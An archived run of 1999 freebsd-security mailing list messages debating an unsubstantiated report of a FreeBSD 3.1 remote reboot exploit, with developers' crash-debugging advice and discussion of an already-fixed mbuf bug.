freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id ECBB414CE9 for ; Tue, 4 May 1999 15:13:50 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id PAA19927; Tue, 4 May 1999 15:13:41 -0700 (PDT) (envelope-from dillon) Date: Tue, 4 May 1999 15:13:41 -0700 (PDT) From: Matthew Dillon Message-Id: <199905042213.PAA19927@apollo.backplane.com> To: Dag-Erling Smorgrav Cc: Jamie Rishaw , security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Jamie. Well, I'm afraid you haven't given us much to go on. If there is indeed an exploit, we probably won't be able to find it until someone catches the panic message that caused the reboot or is otherwise able to supply more information. There are a number of ways to do this. You can compile up a kernel configured to drop into DDB on panic rather then to simply reboot. Then, from the DDB prompt, you can issue a 'trace' command to get a stack trace and from there we can figure out the cause of the panic. Another solution is to compile up a kernel configured with the console on a serial port. You then connect the serial port to another machine and log all the console messages. Using a serial console also allows you to remotely manage the machine fairly easily. It may also be possible to generate a crash dump. This does not require a kernel recompile. The system must have at least as much swap space as main memory and /var/crash must have enough space to fit the entire dump (at least as much space as there is main memory, plus a tad more ). You then enable dumps by specifying the dump device in /etc/rc.conf. If dumps are enabled, there is a good chance that the panic will be able to generate a crash dump before it reboots the machine. For example, if the swap partition is /dev/sd0b, you would enable dumps by placing 'dumpdev="/dev/sd0b"' in /etc/rc.conf and then either rebooting, or running the 'dumpon /dev/sd0b' command manually. If you get a crash dump, you can then use gdb to get a stack backtrace to determine what caused the dump ( if you get that far, ask for help and people can give you more detailed instructions ). Always be extremely careful when enabling dumps, you do not want to accidently dump on a non-swap partition! -Matt Matthew Dillon : :------- Start of forwarded message ------- :Message-ID: <19990501031840.A24252@dilbert.exodus.net> :Date: Sat, 1 May 1999 03:18:40 -0500 :Reply-To: jamie@exodus.net :From: Jamie Rishaw :Subject: FreeBSD 3.1 remote reboot exploit :To: BUGTRAQ@NETSPACE.ORG : :Hi, : : Sorry to be so vague, but I wanted to let everyone know, : : It's been demonstrated to me by two people who will not reveal "how" :that there is a remote bug exploit, almost certainly over IP, that will :cause FreeBSD-3.1 systems to reboot with no warnings. : : The second box this was demonstrated on today had no open services :besides ircd, and was remote rebooted. (The first box had open services :such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd :as the culprit). : : If anyone can shed some light on this (really bad) issue, it'd be :greatly appreciated, especially since I am(was) in the process of :upgrading all of my boxes to 3.1. (3.1-REL). : : Regards, : :-jamie :-- :jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. :>Sr. Network Engr, Chicago, SoCal Data Centers : In an interesting move Exodus Communications annouced today that : they have replaced all of their backbone engineers with furby's : :------- End of forwarded message ------- : : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 15:33:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from angel.double-barrel.be (mail.double-barrel.be [194.7.102.22]) by hub.freebsd.org (Postfix) with ESMTP id 7094A15684; Tue, 4 May 1999 15:32:49 -0700 (PDT) (envelope-from mvergall@ws3.double-barrel.be) Received: from ws3.double-barrel.be (ws3.double-barrel.be [194.7.102.30]) by angel.double-barrel.be (8.9.1b+Sun/8.9.1) with ESMTP id AAA08963; Wed, 5 May 1999 00:32:17 +0200 (MET DST) Received: from localhost (mvergall@localhost) by ws3.double-barrel.be (8.8.7/8.8.7) with ESMTP id AAA06083; Wed, 5 May 1999 00:32:13 +0200 Date: Wed, 5 May 1999 00:32:13 +0200 (CEST) From: "Michael C. Vergallen" To: Tim Priebe Cc: Greg Quinlan , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <372F7025.7081@iafrica.com.na> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't see how this can be a exploit if you have /etc/hosts.deny and /etc/hosts.allow set up correctly and dont allow rcmd commands on your system..I tried to remotely reboot my ftp server here and no it does not work on that machine and I also tried on my gateway machine and no luck there either. Now I will try my print server but I first have to upgrade that box to 3.1 ...However on my network I see more and more poeple scanning with a portscanner so I supose I better keep a look out for strange items in my log files. Michael --- Michael C. Vergallen A.k.A. Mad Mike, Sportstraat 28 http://www.double-barrel.be/mvergall/ B 9000 Gent ftp://ftp.double-barrel.be/pub/linux/ Belgium tel : 32-9-2227764 Fax : 32-9-2224976 On Wed, 5 May 1999, Tim Priebe wrote: > I saw such behavior Sunday when trying to implement a new firewall. The > system would repeatedly panic with a trap 12. This would happen > immediatelly after the login prompt appeared after the previous panic. > The system would be stable, if I removed the first ethernet cable, plug > the cable back in, and a short while later it would start over again. > It was late, and we had to get the system working again, so we restored > to the previous system. I have some information logged for packets at > the time. I will check this and try to reproduce after I finish the > course I am on this week. > > Tim. > > Greg Quinlan wrote: > > > > This sounds so.. so very familiar!! > > > > I have been the target of exploits before...... > > > > The exact same thing I have been experiencing........but not for about 5 > > days now! > > > > I'm not convinced its a pure exploit.. (i.e. a program specifically written > > for the purpose) > > > > Greg > > > > -----Original Message----- > > From: Karl Denninger > > To: chris@calldei.com ; Jordan K. Hubbard > > > > Cc: Mike Smith ; Seth ; > > freebsd-stable@FreeBSD.ORG ; > > security@FreeBSD.ORG ; jamie@exodus.net > > > > Date: 04 May 1999 05:20 > > Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) > > > > >On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: > > >> On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > >> > > I have to say that Jamie really let us down by not running a raw > > >> > > tcpdump alongside the second targetted machine here. Any chance of > > >> > > provoking these people into "demonstrating" the exploit on a machine, > > >> > > while another connected to the same wire is running > > >> > > > >> > I'd say he or whomever first reported this to bugtraq let us down even > > >> > more by releasing an "advisory" in such an unknown and unverifyable > > >> > state. By doing so, all they've done is hand ammunition to the FUD > > >> > corps and given us no reasonable chance to respond since the advisory > > >> > > >> I get the impression that that was the whole point of the > > >> bugtraq post, to give us more grief. > > > > > >Ding! > > > > > >Give that man a cigar. > > > > > >Anyone who saw this done to one machine and didn't *immediately* configure > > >machine #2 to trap and trace on the second instance deserves raspberries - > > >at a minimum. > > > > > >Its one thing to have it done "anyonmously" (among other things you might > > >not be there when it goes "boom" under those conditions!) Its another to > > >have it done under controlled conditions and neither get an explanantion > > >OR trap the condition that caused it yourself with a tcpdump trace. > > > > > >-- > > >-- > > >Karl Denninger (karl@denninger.net) Web: fathers.denninger.net > > >I ain't even *authorized* to speak for anyone other than myself, so give > > >up now on trying to associate my words with any particular organization. > > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > > >with "unsubscribe freebsd-security" in the body of the message > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 15:56:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from etosha (unknown [200.236.148.193]) by hub.freebsd.org (Postfix) with SMTP id 0C8231524E for ; Tue, 4 May 1999 15:56:19 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: (qmail 328 invoked from network); 4 May 1999 22:56:36 -0000 Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 4 May 1999 22:56:36 -0000 Message-ID: <372F7B24.E352AEFF@tdnet.com.br> Date: Tue, 04 May 1999 19:56:36 -0300 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: Warner Losh Cc: security@FreeBSD.ORG Subject: Re: Security advisories References: <372E4911.3A384379@tdnet.com.br> <199905042049.OAA04590@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > In message <372E4911.3A384379@tdnet.com.br> Gustavo V G C Rios writes: > : Where can i get Security advisories for FreeBSD 2.2.8-Stable ? > : http://www.freebsd.org/security/#adv is too old! > : The last one is 08/98, FreeBSD is a very secure OS, or nobody knows it's > : bugs, what's the truth ? > : How can i keep myself up to date with security under FreeBSD ? > > I don't think there have been any security advisories since then. > There have been a number of fixes that might impact security, but none > of them have been severe enough to issue an advisory. > > Warner Thanks a lot! You really helped me, but where can i get such fixes? Is there any central site? Another problem: When a user deletes a file, the OS only removes its inode, is there any utils that writes 1/0 to the Hard Disk blocks ? And about memory, is there any utils that fill in memory with 1/0 ? thanks a lot? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 16: 2:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 25F0114E65 for ; Tue, 4 May 1999 16:02:42 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id QAA07742; Tue, 4 May 1999 16:02:13 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Dag-Erling Smorgrav Cc: security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit In-reply-to: Your message of "04 May 1999 23:22:44 +0200." Date: Tue, 04 May 1999 16:02:13 -0700 Message-ID: <7739.925858933@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please don't forward this kinda stuff - we've all already seen it and, as we've also pointed out numerous times, it says absolutely nothing. - Jordan > ------- Start of forwarded message ------- > Message-ID: <19990501031840.A24252@dilbert.exodus.net> > Date: Sat, 1 May 1999 03:18:40 -0500 > Reply-To: jamie@exodus.net > From: Jamie Rishaw > Subject: FreeBSD 3.1 remote reboot exploit > To: BUGTRAQ@NETSPACE.ORG > > Hi, > > Sorry to be so vague, but I wanted to let everyone know, > > It's been demonstrated to me by two people who will not reveal "how" > that there is a remote bug exploit, almost certainly over IP, that will > cause FreeBSD-3.1 systems to reboot with no warnings. > > The second box this was demonstrated on today had no open services > besides ircd, and was remote rebooted. (The first box had open services > such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd > as the culprit). > > If anyone can shed some light on this (really bad) issue, it'd be > greatly appreciated, especially since I am(was) in the process of > upgrading all of my boxes to 3.1. (3.1-REL). > > Regards, > > -jamie > -- > jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. > >Sr. Network Engr, Chicago, SoCal Data Centers > In an interesting move Exodus Communications annouced today that > they have replaced all of their backbone engineers with furby's > > ------- End of forwarded message ------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 16: 8: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id B8B3014E65 for ; Tue, 4 May 1999 16:07:52 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id QAA20315; Tue, 4 May 1999 16:07:50 -0700 (PDT) (envelope-from dillon) Date: Tue, 4 May 1999 16:07:50 -0700 (PDT) From: Matthew Dillon Message-Id: <199905042307.QAA20315@apollo.backplane.com> To: "Jordan K. Hubbard" Cc: Dag-Erling Smorgrav , security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit References: <7739.925858933@zippy.cdrom.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Please don't forward this kinda stuff - we've all already seen it :and, as we've also pointed out numerous times, it says absolutely :nothing. : :- Jordan Maybe so, but if he is who his signature says he is, he deserves a professional answer that might (hopefully) prompt him to educate himself. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 16:32:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id CD11615C23 for ; Tue, 4 May 1999 16:32:05 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id QAA07969; Tue, 4 May 1999 16:31:42 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Matthew Dillon Cc: Dag-Erling Smorgrav , security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit In-reply-to: Your message of "Tue, 04 May 1999 16:07:50 PDT." <199905042307.QAA20315@apollo.backplane.com> Date: Tue, 04 May 1999 16:31:42 -0700 Message-ID: <7965.925860702@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Maybe so, but if he is who his signature says he is, he deserves > a professional answer that might (hopefully) prompt him to > educate himself. As far as I've been able to tell, he went straight underground after posting his "advisory" and isn't particularly in the mood for an education. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 16:40:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from othello.cnmnetwork.com (othello.cnmnetwork.com [209.79.28.30]) by hub.freebsd.org (Postfix) with SMTP id 3FA3614E7F for ; Tue, 4 May 1999 16:40:40 -0700 (PDT) (envelope-from jrz@cnmnetwork.com) Received: (qmail 6285 invoked from network); 4 May 1999 16:40:37 -0700 Received: from prometheus.cnmnetwork.com (HELO compton) (209.79.28.5) by othello.cnmnetwork.com with SMTP; 4 May 1999 16:40:37 -0700 Message-ID: <005401be9688$3cbcaff0$4e00000a@compton.cnmnetwork.com> Reply-To: "Jacob Zehnder" From: "Jacob Zehnder" To: Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit Date: Tue, 4 May 1999 16:45:49 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3612.1700 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3612.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i agree with jordan, this advisory says ABSOLUTELY nothing. when you post such warnings with no proof it makes on think that the person who posts is more interested in fame. if indeed this is a real problem ask the people who compromised your machine to contact the developers of FreeBSD and nip the problem in the bud. "the sky is falling, the sky is falling" comes to mind.. --jacob Jacob Zehnder Network Engineer CNMNetwork http://www.cnmnetwork.com -----Original Message----- From: Jordan K. Hubbard To: Matthew Dillon Cc: Dag-Erling Smorgrav ; security@FreeBSD.ORG Date: Tuesday, May 04, 1999 4:33 PM Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit >> Maybe so, but if he is who his signature says he is, he deserves >> a professional answer that might (hopefully) prompt him to >> educate himself. > >As far as I've been able to tell, he went straight underground after >posting his "advisory" and isn't particularly in the mood for an >education. > >- Jordan > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 16:51:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from minnie.atarde.com.br (minnie.atarde.com.br [200.223.87.8]) by hub.freebsd.org (Postfix) with ESMTP id 0181F15268 for ; Tue, 4 May 1999 16:51:09 -0700 (PDT) (envelope-from saback@atarde.com.br) Received: from marvin (marvin.atarde.com.br [200.223.87.230]) by minnie.atarde.com.br (8.8.8/8.8.8) with SMTP id UAA28785 for ; Tue, 4 May 1999 20:51:08 -0300 (EST) (envelope-from saback@atarde.com.br) From: "Humberto Saback" To: Subject: Date: Tue, 4 May 1999 20:51:04 -0300 Message-ID: <003b01be9688$f9b8a960$e657dfc8@marvin.atarde.com.br> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe ====================== A TARDE OnLine Humberto Saback Júnior Coordenador Técnico http://www.atarde.com.br To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 17: 3:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id B52461554C for ; Tue, 4 May 1999 17:03:43 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id RAA06559; Tue, 4 May 1999 17:03:27 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id RAA18620; Tue, 4 May 1999 17:03:26 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id RAA06539; Tue, 4 May 1999 17:03:25 -0700 (PDT) From: Don Lewis Message-Id: <199905050003.RAA06539@salsa.gv.tsc.tdk.com> Date: Tue, 4 May 1999 17:03:24 -0700 In-Reply-To: Warner Losh "Re: freebsd mbuf crash" (May 4, 3:03pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Warner Losh , Darren Reed Subject: Re: freebsd mbuf crash Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 4, 3:03pm, Warner Losh wrote: } Subject: Re: freebsd mbuf crash } In message <199905041526.BAA29421@cheops.anu.edu.au> Darren Reed writes: } : is this one (below) taken care of ? perhaps a derivitice of this ? } } What's it supposed to do? I can't get it to cause any grief on my } -current system, nor on the 3.1-stable based systems we have here at } work. I believe this was fixed by version 1.103 of sys/netinet/ip_input.c. This change was made shortly after 3.0-RELEASE. The original exploit code only ran correctly on Linux (and nuked FreeBSD machines). It didn't do anything interesting when run under FreeBSD, because the byte order of various IP headers sent on raw sockets differs between Linux and FreeBSD. This caused various sanity checks in the FreeBSD stack to toss the packet instead of sending it. If you tweak the byte order in the exploit code, you can get it to run under FreeBSD and crash vulnerable FreeBSD machines. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 17:19:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from tesla-e0.salk.edu (tesla-e0.salk.edu [198.202.70.1]) by hub.freebsd.org (Postfix) with ESMTP id B342B156E7; Tue, 4 May 1999 17:19:11 -0700 (PDT) (envelope-from jorge@salk.edu) Received: from remak.salk.edu (remak.salk.edu [198.202.70.48]) by tesla-e0.salk.edu (8.7.5/8.7.3) with SMTP id RAA25857; Tue, 4 May 1999 17:18:59 -0700 (PDT) Date: Tue, 4 May 1999 17:18:56 -0700 (PDT) From: Jorge Aldana Reply-To: Jorge Aldana To: Mike Uttech Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <19990504210951.3781215C1E@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So, rebooting when a machine is overloaded is not a problem? It seems (from the current and past questions to security and questions mail lists) that something is going on with this. Just because we can't solve it doesn't mean its not there, mysterious re-boots seem to be occuring at my site off and on. As soon as we up the debuging nothing happens (this alone changes a variable within the system), as most sites and people I've talked to we lack time, from debuging and actually keeping the systems running. I have seen too many variables in determining what caused a system to crash and repeating a case never has resulted in a reproduction of said problem. It seems from the responses that this is an acceptable symptom of FreeBSD 3.1 (release and stable)? From my logs, machines have stayed up since FreeBSD 3.1 Stable was installed (19990303) and others have rebooted the next day and all combinations in between (but none are consistent). It may or may not help but that has been my experince. Jorge On Tue, 4 May 1999, Mike Uttech wrote: > We used to have problems with one of our 3.1-RELEASE boxes randomly > locking up with no logs of why. We decided to split the load off of the > one machine and have not had a problem with it locking up since. If my > memory serves me today, I remember reading about a problem in the > 3.1-RELEASE distribution that under heavy load caused the system to hang or > reboot. I personally feel that many of these people (the ones who are > saying they have been having random reboots) are not being attacked in > anyway but rather are having their machines overloaded and rebooting. > > > Mike > > > At 03:53 PM 5/4/99 , Warner Losh wrote: > >In message Vince Vielhaber writes: > >: It's typically in bad taste to post it to BugTraq before contacting the > >: vendor. > > > >I can say that no one appears to have contacted security-officer about > >this. People have contacted us in the past saying that their machine > >randomly reboots. When pressed for details, or to enable ddb or crash > >dumps to see why the machine is rebooting, they disappear and nothing > >further is heard from them. > > > >Warner > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 19:57:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 400FB1507A for ; Tue, 4 May 1999 19:57:52 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id MAA07852; Wed, 5 May 1999 12:57:13 +1000 (EST) From: Darren Reed Message-Id: <199905050257.MAA07852@cheops.anu.edu.au> Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit To: jkh@zippy.cdrom.com (Jordan K. Hubbard) Date: Wed, 5 May 1999 12:57:12 +1000 (EST) Cc: dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG In-Reply-To: <7965.925860702@zippy.cdrom.com> from "Jordan K. Hubbard" at May 4, 99 04:31:42 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jordan K. Hubbard, sie said: > > > Maybe so, but if he is who his signature says he is, he deserves > > a professional answer that might (hopefully) prompt him to > > educate himself. > > As far as I've been able to tell, he went straight underground after > posting his "advisory" and isn't particularly in the mood for an > education. So at this point, are you or one of the other freebsd people going to post a reply to bugtraq requesting more information and/or denying that it is a problem until it can be proved more conclusively ? Being on the cusp of a release & Usenix, this needs to be settled one way or another. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 20: 1: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 658C01501A for ; Tue, 4 May 1999 20:01:03 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id XAA07638; Tue, 4 May 1999 23:00:44 -0400 (envelope-from jared) Date: Tue, 4 May 1999 23:00:44 -0400 From: Jared Mauch To: Darren Reed Cc: "Jordan K. Hubbard" , dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit Message-ID: <19990504230044.A7490@puck.nether.net> Mail-Followup-To: Darren Reed , "Jordan K. Hubbard" , dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG References: <7965.925860702@zippy.cdrom.com> <199905050257.MAA07852@cheops.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905050257.MAA07852@cheops.anu.edu.au>; from Darren Reed on Wed, May 05, 1999 at 12:57:12PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org he's in the process of moving from chi->la was packing up last week when I spoke with him. - jared On Wed, May 05, 1999 at 12:57:12PM +1000, Darren Reed wrote: > In some mail from Jordan K. Hubbard, sie said: > > > > > Maybe so, but if he is who his signature says he is, he deserves > > > a professional answer that might (hopefully) prompt him to > > > educate himself. > > > > As far as I've been able to tell, he went straight underground after > > posting his "advisory" and isn't particularly in the mood for an > > education. > > So at this point, are you or one of the other freebsd people going to > post a reply to bugtraq requesting more information and/or denying that > it is a problem until it can be proved more conclusively ? Being on the > cusp of a release & Usenix, this needs to be settled one way or another. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 20:30:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 296EF15810 for ; Tue, 4 May 1999 20:29:56 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id VAA18500; Tue, 4 May 1999 21:29:47 -0600 (MDT) Message-Id: <4.2.0.37.19990504212515.045d3100@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Tue, 04 May 1999 21:29:41 -0600 To: "Jacob Zehnder" , From: Brett Glass Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit In-Reply-To: <005401be9688$3cbcaff0$4e00000a@compton.cnmnetwork.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What would be the motivation for FUDding FreeBSD in this way? I would not panic, but I would also ask for more information and would not dismiss the report out of hand. The tone of Jordan's message makes him look defensive rather than cautious and diligent. --Brett At 04:45 PM 5/4/99 -0700, Jacob Zehnder wrote: >i agree with jordan, this advisory says ABSOLUTELY nothing. when you post >such warnings with no proof it makes on think that the person who posts is >more interested in fame. if indeed this is a real problem ask the people >who compromised your machine to contact the developers of FreeBSD and nip >the problem in the bud. "the sky is falling, the sky is falling" comes to >mind.. > >--jacob > >Jacob Zehnder >Network Engineer >CNMNetwork http://www.cnmnetwork.com > >-----Original Message----- >From: Jordan K. Hubbard >To: Matthew Dillon >Cc: Dag-Erling Smorgrav ; security@FreeBSD.ORG > >Date: Tuesday, May 04, 1999 4:33 PM >Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot >exploit > > > >> Maybe so, but if he is who his signature says he is, he deserves > >> a professional answer that might (hopefully) prompt him to > >> educate himself. > > > >As far as I've been able to tell, he went straight underground after > >posting his "advisory" and isn't particularly in the mood for an > >education. > > > >- Jordan > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 20:39:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 18F3E15298; Tue, 4 May 1999 20:39:23 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id VAA18567; Tue, 4 May 1999 21:39:08 -0600 (MDT) Message-Id: <4.2.0.37.19990504213441.045d6c50@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Tue, 04 May 1999 21:37:59 -0600 To: Jorge Aldana , Mike Uttech From: Brett Glass Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) 